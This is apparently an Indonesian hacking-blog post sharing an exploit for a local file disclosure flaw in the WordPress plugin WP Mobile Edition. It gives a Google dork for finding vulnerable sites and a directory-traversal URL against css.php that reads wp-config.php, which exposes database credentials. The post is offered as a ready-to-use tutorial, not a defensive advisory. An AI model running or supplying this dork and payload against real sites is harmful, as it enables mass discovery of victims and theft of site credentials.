Exploit WordPress Plugin WP Mobile Edition Local File Disclosure Vulnerability

Yupp, kali ini mau share lagi exploit pada WordPress yang memiliki celah pada plugins WP Mobile Edition.
Plugin ‘WP Mobile Edition’ ini tidak memfilter parameter GET file di /themes/mTheme-Unus/css/css.php . Alhasil kita juga dapat melihat source dari konfigurasi WordPress yang terletak di wp-config.php .
Oke langsung saja.
Google Dorks :
inurl:?fdx_switcher=mobile
Exploit :
127.0.0.1/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

Tested on : BackBox Linux

Sekian tutor kali ini semoga bermanfaat.

Shares

Leave a Reply